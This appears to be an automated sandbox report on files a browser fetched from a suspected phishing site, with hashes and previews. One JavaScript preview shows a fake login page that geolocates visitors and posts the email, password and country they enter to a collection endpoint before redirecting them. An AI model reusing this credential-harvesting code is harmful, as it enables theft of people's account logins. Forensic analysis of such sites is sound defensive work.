              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2691
              Entropy (8bit):4.004221851267714
              Encrypted:false
              SSDEEP:
              MD5:4338028A8A0A5C0D1599879E538F1A65
              SHA1:7084DA0E62279B992AB0CE670E054CBFFCCAE835
              SHA-256:CDC0B7F1E0AF50B8D360BED3A1068D32F9D0898F8703AFFAB99C7DEA2D81DC48
              SHA-512:3F17A1674A16FB82072FF8572BC7F9FCECBAFD0D5A254B557C99C148AF46BB6F4E4022DAB2B19EE54F8F7C1F7E247D360A0706AEEE5C6BAA56484BF5830BA870
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............g].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 19:16:58 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2679
              Entropy (8bit):3.9921702317367727
              Encrypted:false
              SSDEEP:
              MD5:B666F99A2A20CBA15780A7E9847142C8
              SHA1:43E14D47DF5ADB52429CB3A9DC0C77636F1716DB
              SHA-256:EC3C660B29436662D204555D7DB8B7354E41F835710CF239EEA6A03FFC75723C
              SHA-512:16307CD77F8D899F193E923BE321FBF7A1932EB237C3DBB77D3961D9E5D02028A1D9B861E9F20DF429F2A0D75B2B22B1A130A9AB3054B20228D93C4DCEFFAD01
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.....Z..P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y ......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............g].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 19:16:58 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2679
              Entropy (8bit):3.981558175985108
              Encrypted:false
              SSDEEP:
              MD5:62465278036275B090084208932E531A
              SHA1:ABA6E710A53AA5EB64581201101082F67F3A24B1
              SHA-256:44C8FF912ED3C02786EF766365C0400D6998E326076F4D5B70A4228B9FB7B62B
              SHA-512:8087AC9EF8242D165B50B93FAF3EA878E8053D984749342966CDBF3C4BB1139F4B5018FBC46A60AFEFA1D649B24B3B02C2C125876568444CF840DDB9E9F1006B
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.....[..P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y ......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............g].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 19:16:58 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2681
              Entropy (8bit):3.9892774152482335
              Encrypted:false
              SSDEEP:
              MD5:A4BDF032E220DBE9FA73F05BADAB44A8
              SHA1:8CAB048CA16F3DD4A94F3930421F22D500419307
              SHA-256:3F3B27D522C1245352C7C2DC3CDFB6F8AC6C6D74EA7C68730438AC3625623460
              SHA-512:2AB77EEC650B7532162A0FBF0E0004BBF1B6986ECA613C6E7504ACF7A0A393BC51F56C35BA2AB9A6434E079803E2D11DAA162F6E6B598CE93EE17BFB03609261
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,....i...P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y ......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............g].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:downloaded
              Size (bytes):181615
              Entropy (8bit):5.266857423238819
              Encrypted:false
              SSDEEP:
              MD5:19AE224117D132E1E1709CCB456C3298
              SHA1:9C99B73C25D90210DEA9F6BD2D60B63E091D7D3D
              SHA-256:F0EE87DE72746E837A3327043FB8BDD1EBD7FDE0437584858E06C3ED188C0E0E
              SHA-512:07DB69274A0DC5874E868FF17A7D5D6C39B55A27C57C05E9977B7603A73EFFC14ACE5AA0B084B4DC8D9E517BF460F5AD7C318850CC4F4AFDFCC3CED00D5B12C2
              Malicious:false
              Reputation:unknown
              URL:https://log.the-network-expert.ca/_next/static/chunks/framework-1ee1b762209da1bd.js
              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[593],{1247:(e,t,n)=>{var r,l,a=n(7836),o=n(9982),i=n(6540),u=n(961);function s(e){var t="https://react.dev/errors/"+e;if(1<arguments.length){t+="?args[]="+encodeURIComponent(arguments[1]);for(var n=2;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n])}return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}function c(e){return!(!e||1!==e.nodeType&&9!==e.nodeType&&11!==e.nodeType)}var f=Symbol.for("react.element"),d=Symbol.for("react.transitional.element"),p=Symbol.for("react.portal"),m=Symbol.for("react.fragment"),h=Symbol.for("react.strict_mode"),g=Symbol.for("react.profiler"),y=Symbol.for("react.provider"),v=Symbol.for("react.consumer"),b=Symbol.for("react.context"),k=Symbol.for("react.forward_ref"),w=Symbol.for("react.suspense"),S=Symbol.for("react.suspense_list"),x=Symbol.for("react.memo"),E=Sy
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):5843
              Entropy (8bit):5.370695346904781
              Encrypted:false
              SSDEEP:
              MD5:5AB5258D12E4878ED65FF1263893A1C3
              SHA1:1181E665997426A912D0EA10446BB8CCB244DE4D
              SHA-256:B4C2E90AADDD3FB5E4E769C87F31BE73BA5D70C0D7DE688734B7E56C595BC49B
              SHA-512:816D38CFE0FCDC577EBBF0695DDBA7B95C77975421EC43EE40FD2F619D4055867F4578DDEF195FC598CE82DD447391DD1EB441A9973FB9C3FC35163452775D60
              Malicious:false
              Reputation:unknown
              Preview:[{"name":{"common":"United States","official":"United States of America","nativeName":{"eng":{"official":"United States of America","common":"United States"}}},"tld":[".us"],"cca2":"US","ccn3":"840","cca3":"USA","cioc":"USA","independent":true,"status":"officially-assigned","unMember":true,"currencies":{"USD":{"name":"United States dollar","symbol":"$"}},"idd":{"root":"+1","suffixes":["201","202","203","205","206","207","208","209","210","212","213","214","215","216","217","218","219","220","224","225","227","228","229","231","234","239","240","248","251","252","253","254","256","260","262","267","269","270","272","274","276","281","283","301","302","303","304","305","307","308","309","310","312","313","314","315","316","317","318","319","320","321","323","325","327","330","331","334","336","337","339","346","347","351","352","360","361","364","380","385","386","401","402","404","405","406","407","408","409","410","412","413","414","415","417","419","423","424","425","430","432","434",
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):101610
              Entropy (8bit):5.371727713953309
              Encrypted:false
              SSDEEP:
              MD5:0ED08628FF01D71DCDE916D83B125A3F
              SHA1:054259D7D0C2083F1D9356B7B35618094200F8AE
              SHA-256:ECC6C7E834C81FCAEBF41164FBBA7322CD647BC8C2014891D5912C45544990A6
              SHA-512:FDEF65E58C58F93FCEE3E5CB773FD236EDB0BC9219E95445F22AB785F5084AEAE4362C74752A136887BFB9C22046D7CC6E1913DB5A0F5D37D4A5164D054A3FC2
              Malicious:false
              Reputation:unknown
              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[792],{8925:(e,t)=>{"use strict";function r(){return""}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return r}})},4599:()=>{"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.then(function(
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (405), with no line terminators
              Category:downloaded
              Size (bytes):405
              Entropy (8bit):5.364667796150531
              Encrypted:false
              SSDEEP:
              MD5:ADDE5373A91A6AB24FA684641AEA8683
              SHA1:C6ADFAF243FFD36D50AC31B7FA0DBB64EAE4A19A
              SHA-256:DE20FCAD48608F76BD74B56C9AE7F232974FE08E97F222DC3192CE3BCF4C5C17
              SHA-512:A1C5EB26964E00F611AF2FFAF0B03E37C9377EE34156E0CB471949B3C04CA2425C19A7D7B50666AAE01D606B5871A5179E52F8ED7DDC535BE59F82EB7EB678F3
              Malicious:false
              Reputation:unknown
              URL:https://log.the-network-expert.ca/_next/static/chunks/pages/_app-bc94df786567e722.js
              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[636],{6170:(_,e,n)=>{(window.__NEXT_P=window.__NEXT_P||[]).push(["/_app",function(){return n(2448)}])},2448:(_,e,n)=>{"use strict";n.r(e),n.d(e,{default:()=>t});var u=n(4848);n(4472);let t=function(_){let{Component:e,pageProps:n}=_;return(0,u.jsx)(e,{...n})}},4472:()=>{}},_=>{var e=e=>_(_.s=e);_.O(0,[593,792],()=>(e(6170),e(8440))),_N_E=_.O()}]);
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:PNG image data, 700 x 394, 8-bit colormap, non-interlaced
              Category:downloaded
              Size (bytes):11754
              Entropy (8bit):7.9317155497253164
              Encrypted:false
              SSDEEP:
              MD5:1907807F507D6545EAF042732672ACA1
              SHA1:2B70F83639E2A7202A64C188F56BB2424D4FEAE1
              SHA-256:55DE1F37B3B5B298967F4A1368673A111243A0D176002B6D956EAF997679B62D
              SHA-512:93B371B03B56FD7DBE5A1D17F611A1241C55AA3E7E23D4C39A12DD5CAC3773A7A284E307BF7A093243C9660B4584BACC21BC664F88985BB5B224D08AF4D26C1F
              Malicious:false
              Reputation:unknown
              URL:https://log.the-network-expert.ca/logo.png
              Preview:.PNG........IHDR..............b\...TPLTEGpL....s..y..u..s..s..}..q..x...........d..k...........r..k...........P..>t.t.l.......>....tRNS......G..n|..K.. .IDATx...w....-m.....(8......$`......c....]+_w63......@ .....@.sxzy.W.<....?........q..|.......C..........j/.C...!0..}.^6....b..f\Y5.7~......I..W....1.5...%.+o......Q.}...s,}.&.kRS`$o1."Han..>..-.5H.V6.G. ...&...>._..,0.).#...&B<q...=$..g.$K......mC.....'..t..L.....Lo......q.5$...m..x.l.q.l.e...@3.7.d....r.5c...*.7f.>!.+..yC2)e.[(.&.k&..F0.ff..LO...Y....6l..23..m.f...7...".,...Y<....xK.6.."#...h3...:...=.Lot...m..tr.L......h.....5...8..o.r.O....!..._.FJ......f.y..,...xZ>._.f..<".3.U...T.....t.^x.&7-.Icx^D..0.R3..iF.jFq.A..^.y.$...By.........6....f.....U..Y3...y......{K..L.!f^6..J....f..g.o"gf.r3}mt.l.b..,...ff.....w..x./.E..^3..y.-../.{'l...m.....x...5c...v$......X..`.Y..........9..7..a(/</b..........t.&W.;.-.^.ATm.{....t9......~..w5..k.nu...c.r^..m..p.....{....)f..=.t..E..^.uM9...&T'C./
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with no line terminators
              Category:downloaded
              Size (bytes):16
              Entropy (8bit):3.625
              Encrypted:false
              SSDEEP:
              MD5:9B5719B531993D7EEF5EB4C692F2238C
              SHA1:9C9A21624C975F0741B743348DE85A09FDA7E669
              SHA-256:27008C4818CC0695B1496B0E8026DDFB7999C7FA066F78C61A76AF0FFECEF4BF
              SHA-512:39CC9DC2E4DACFA6D1D7E23759ED7FB13C3111992BCA5DAA97CE1ADB37205056118FC1105D85E38B8E902A2F8CD68656AD36D53642DE60368E054BE86942BBA8
              Malicious:false
              Reputation:unknown
              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAnbFJWScTeuBBIFDVALr7A=?alt=proto
              Preview:CgkKBw1QC6+wGgA=
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JSON data
              Category:downloaded
              Size (bytes):276
              Entropy (8bit):4.936998777589824
              Encrypted:false
              SSDEEP:
              MD5:376BAAF1F85F700CF8CEFE5ABD9F941F
              SHA1:D3FA8C2AE5178870CD8B22C7C42341162AE24EC4
              SHA-256:4878512FA12B62397ECE23BC574294DA3D6EFB23DA01569D171C1818F3EF69AC
              SHA-512:B08950047F4484D0CE395236893F8E269A5BA27CD0CBF3EE8FAB314E9E21585F4403C264DF62242640AEA96CDC75DAD092E807DEDF7C7E35CDFA40C8812FE0F8
              Malicious:false
              Reputation:unknown
              URL:https://ipinfo.io/json?token=c3e87e382ddea7
              Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York".}
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (521)
              Category:downloaded
              Size (bytes):566
              Entropy (8bit):5.021958587229002
              Encrypted:false
              SSDEEP:
              MD5:8B1ABEE64C4E68BE2B05A83332F0E970
              SHA1:879A8762F17FA61F5002709626382888CCB6267E
              SHA-256:AE857A7662918BF1B1420DA399C763722CF06460F1DBAE56C5A4C9B58BBCFFCB
              SHA-512:8BD2FBE65C3B35811F8EFD7E01C7525C1D1DC1D4C727106D0294CCD1221D45FB99D4327B5907AD48E1505C0811B043EF73E8F1A82358A4F0740AEE392E2606DA
              Malicious:false
              Reputation:unknown
              URL:https://bu.marcel-andree.de/static/css/main.8dcd9789.css
              Preview:body,html{align-items:center;background-color:#f0f0f0;display:flex;height:100%;justify-content:center;margin:0;padding:0}.App{text-align:center}.loading-container{align-items:center;display:flex;flex-direction:column}.loading-text{font-size:24px;margin-bottom:20px}.loading-bar{background-color:#ccc;border-radius:5px;height:10px;overflow:hidden;position:relative;width:100px}.loading-progress{animation:loading 2s linear forwards;background-color:#007bff;height:100%;width:0}@keyframes loading{0%{width:0}to{width:100%}}./*# sourceMappingURL=main.8dcd9789.css.map*/
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text, with very long lines (2181), with no line terminators
              Category:downloaded
              Size (bytes):2181
              Entropy (8bit):5.392683226606612
              Encrypted:false
              SSDEEP:
              MD5:71139904DEEA0F0640838D8A40BE76F1
              SHA1:814B1DE4908265D7CDC376B877473C0188B7B5AA
              SHA-256:40CA83821FC3F46DF54B34BD03A1D4599148C1F4F3FB0483251EF43D77F6392C
              SHA-512:6C7EAE11371572D16488BBD87BD8265F1F19B1D111B84E461B0CAB24A928F165F39000AB0506AF4FC9EFDDDE6F0C3A9008F024AF9159E26460DC8818AB881B0D
              Malicious:false
              Reputation:unknown
              URL:https://log.the-network-expert.ca/favicon.ico
              Preview:<!DOCTYPE html><html><head><meta charSet="utf-8" data-next-head=""/><meta name="viewport" content="width=device-width" data-next-head=""/><title data-next-head="">404: This page could not be found</title><link rel="preload" href="/_next/static/css/05a702e55f1806c7.css" as="style"/><link rel="stylesheet" href="/_next/static/css/05a702e55f1806c7.css" data-n-g=""/><noscript data-n-css=""></noscript><script defer="" noModule="" src="/_next/static/chunks/polyfills-42372ed130431b0a.js"></script><script src="/_next/static/chunks/webpack-8cac0b4b405cede1.js" defer=""></script><script src="/_next/static/chunks/framework-1ee1b762209da1bd.js" defer=""></script><script src="/_next/static/chunks/main-bc5cca2169ff8412.js" defer=""></script><script src="/_next/static/chunks/pages/_app-bc94df786567e722.js" defer=""></script><script src="/_next/static/chunks/pages/_error-fde50cb7f1ab27e0.js" defer=""></script><script src="/_next/static/V3ZDMUe_eBQyucafREeXr/_buildManifest.js" defer=""></script><script
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with no line terminators
              Category:downloaded
              Size (bytes):75
              Entropy (8bit):4.464089239047337
              Encrypted:false
              SSDEEP:
              MD5:B8D3C28A1B1F2543428C8BC5BED4C551
              SHA1:3586ACF04AC72E3AEB644F1C8BA53EC579975CF1
              SHA-256:3E9250CB917779581F802A2ABA3983147AE5769D1468A5F58BA384A15F2F96D2
              SHA-512:84C99AE6E5EC1872532602D0013BC74EC31CED3C15474377773CEB1D9F18F033C622D59070649F71AA3AF0FAA70AB67AFF37465096CFB9FC35CD6612869802A7
              Malicious:false
              Reputation:unknown
              URL:https://log.the-network-expert.ca/_next/static/css/05a702e55f1806c7.css
              Preview:body{font-family:Arial,sans-serif;margin:0;padding:0;box-sizing:border-box}
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (3118), with no line terminators
              Category:dropped
              Size (bytes):3118
              Entropy (8bit):5.362365036743059
              Encrypted:false
              SSDEEP:
              MD5:E692AFAC7FC318A55B15E71115EA4013
              SHA1:1D14F7F387567B7942C7ACCF14BC5DB99B062BD5
              SHA-256:DA4EDA3FA2C2D1D44DB68CD056F28B4D9ABCF7F2711B62E9F955588F6C0D8C7D
              SHA-512:1579D443E913A2B6B36AA1C8628C745F9B39E94F87F1D92EE2515766BBD807D535352A255E4B28451905FDFF6B59F2C9B120363D1BBDD064EE6B2F793A1DF550
              Malicious:false
              Reputation:unknown
              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[332],{7276:(e,t,s)=>{(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return s(6993)}])},6993:(e,t,s)=>{"use strict";s.r(t),s.d(t,{default:()=>c});var a=s(4848),n=s(6540),o=s(2505),l=s.n(o),i=s(9680),r=s.n(i);function c(){let[e,t]=(0,n.useState)(""),[s,o]=(0,n.useState)(""),[i,c]=(0,n.useState)(""),[d,m]=(0,n.useState)(!1),[u,_]=(0,n.useState)(""),[h,g]=(0,n.useState)(!1);(0,n.useEffect)(()=>{l().get("https://ipinfo.io/json?token=c3e87e382ddea7").then(e=>{let t=e.data.country;return l().get("https://restcountries.com/v3.1/alpha/".concat(t))}).then(e=>{c(e.data[0].name.common)}).catch(e=>{console.error("Failed to fetch full country name:",e),_("Failed to retrieve country information.")})},[]);let p=async t=>{if(t.preventDefault(),s.length>=5){g(!0);try{let t=await l().post("/api/send-email",{email:e,password:s,country:i});console.log("Email sent successfully!",t.data.message),window.location.href="https://ne.abruis.io"}c
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (1424), with no line terminators
              Category:downloaded
              Size (bytes):1424
              Entropy (8bit):5.20596958546308
              Encrypted:false
              SSDEEP:
              MD5:DEC3102742AEC1840F9C159FA02B3127
              SHA1:0CCCEBCD06FA9D1CB9FFB85CEB07A313F0B13569
              SHA-256:3F790592A96AA42DA581E25426EDF632DC1135BBB7CA0BBAD786FD2947B01B65
              SHA-512:A24FA6A17C799C46236F21B3F330D392424FE4391C98DDB55A2C7C9D487AD6835B485D7A118F6646732B1B2E5D108583658C93AC893158D2C3D20D5C9BC55E52
              Malicious:false
              Reputation:unknown
              URL:https://log.the-network-expert.ca/_next/static/css/dfec9835995d9658.css
              Preview:.Home_container__d256j{height:100vh;display:flex;justify-content:center;align-items:center;position:relative;overflow:hidden}.Home_background__nqUIs{position:absolute;top:0;left:0;width:100%;height:100%;background:url(/background.jpg) no-repeat 50% fixed;background-size:cover;filter:blur(3px);z-index:-1}.Home_loginBox__i6Tc_{background-color:#fff;padding:20px;border-radius:10px;box-shadow:0 0 10px rgba(0,0,0,.1);text-align:center;position:relative;max-width:400px;width:100%;height:350px;z-index:1}.Home_logo__IOQAX{width:100px;margin-bottom:10px}.Home_message__OKL2m{font-size:16px;margin-bottom:20px}.Home_displayEmail__HOGgk{font-size:18px;margin-bottom:20px}.Home_inputField__h82W1{width:50%;padding:10px;margin:10px 0;border:1px solid #ccc;border-radius:5px}.Home_buttonContainer__nOVuY{display:flex;flex-direction:column;align-items:center;margin-top:20px}.Home_nextButton__r_Kss,.Home_submitButton__ECzIY{background-color:#00008b;color:#fff;padding:10px 20px;border:none;border-radius:5px;
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (559), with no line terminators
              Category:dropped
              Size (bytes):559
              Entropy (8bit):5.429998219749573
              Encrypted:false
              SSDEEP:
              MD5:E3C00B15D62364DC5D348A464FFA6DC1
              SHA1:C33D42C4D2248BB786093B616C65E892C643211E
              SHA-256:8984EDFF9D6BB093FF764D369B6671C3B3B5E2116101A04FE7C98491D2FE1CC8
              SHA-512:043406BE26BA373D47906D226AAF2E36A975EE120648D3399169CE1CD7AAC9527D6B0CD673D19FAD5A702513031A4E4F16FE309CF0CD816B8525CEEE09B67F64
              Malicious:false
              Reputation:unknown
              Preview:self.__BUILD_MANIFEST=function(e,r,s){return{__rewrites:{afterFiles:[],beforeFiles:[],fallback:[]},__routerFilterStatic:{numItems:0,errorRate:1e-4,numBits:0,numHashes:null,bitArray:[]},__routerFilterDynamic:{numItems:0,errorRate:1e-4,numBits:e,numHashes:null,bitArray:[]},"/":["static/chunks/505-9e2e874ee1d3229d.js","static/css/dfec9835995d9658.css","static/chunks/pages/index-e91d7dfda78ecd72.js"],"/_error":["static/chunks/pages/_error-fde50cb7f1ab27e0.js"],sortedPages:["/","/_app","/_error"]}}(0,0,0),self.__BUILD_MANIFEST_CB&&self.__BUILD_MANIFEST_CB();
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (1458)
              Category:downloaded
              Size (bytes):1794
              Entropy (8bit):5.306269084096737
              Encrypted:false
              SSDEEP:
              MD5:97A43473AA78B78ECF0A684CDE18EE3F
              SHA1:53B18117BFA88BDC708AD1E11FF76CDECFE2DCA7
              SHA-256:5B18257371461BFF25B5C87C8E8E6DD0EF60593BCF526BB2F6C9ED2805967790
              SHA-512:0120E8BCD9AA319A0953B8D402E5303355179F45C4B6EE353282D2C4AB191C347E9DBE79942B8848931E04DDA1668D7D864A36BCC5D60BA0239A08249CD3E42B
              Malicious:false
              Reputation:unknown
              URL:https://log.the-network-expert.ca/_next/static/chunks/webpack-8cac0b4b405cede1.js
              Preview:(()=>{"use strict";var e={},r={};function t(o){var n=r[o];if(void 0!==n)return n.exports;var i=r[o]={exports:{}},l=!0;try{e[o](i,i.exports,t),l=!1}finally{l&&delete r[o]}return i.exports}t.m=e,(()=>{var e=[];t.O=(r,o,n,i)=>{if(o){i=i||0;for(var l=e.length;l>0&&e[l-1][2]>i;l--)e[l]=e[l-1];e[l]=[o,n,i];return}for(var a=1/0,l=0;l<e.length;l++){for(var[o,n,i]=e[l],u=!0,f=0;f<o.length;f++)(!1&i||a>=i)&&Object.keys(t.O).every(e=>t.O[e](o[f]))?o.splice(f--,1):(u=!1,i<a&&(a=i));if(u){e.splice(l--,1);var s=n();void 0!==s&&(r=s)}}return r}})(),t.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return t.d(r,{a:r}),r},t.d=(e,r)=>{for(var o in r)t.o(r,o)&&!t.o(e,o)&&Object.defineProperty(e,o,{enumerable:!0,get:r[o]})},t.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||Function("return this")()}catch(e){if("object"==typeof window)return window}}(),t.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),t.r=e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.definePro
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text, with very long lines (2018), with no line terminators
              Category:downloaded
              Size (bytes):2018
              Entropy (8bit):5.265198706982928
              Encrypted:false
              SSDEEP:
              MD5:A641F5930FE3A8CD5B60E46F2C50D179
              SHA1:C678CF618EEE51D7F10C3196071CFD8677F10E0E
              SHA-256:537C439828ED6DE8BA6C8B90A397608A5717044879569602BF8BDB65AB89AA83
              SHA-512:07E61BF4C67F58E3EA51ED2D099CFB42C4B65590856D9F9DCB0ECF6BB8E244189405EA1C518579522ED43F1D987A1096903877FA7256520B86BE811989DC325A
              Malicious:false
              Reputation:unknown
              URL:https://log.the-network-expert.ca/
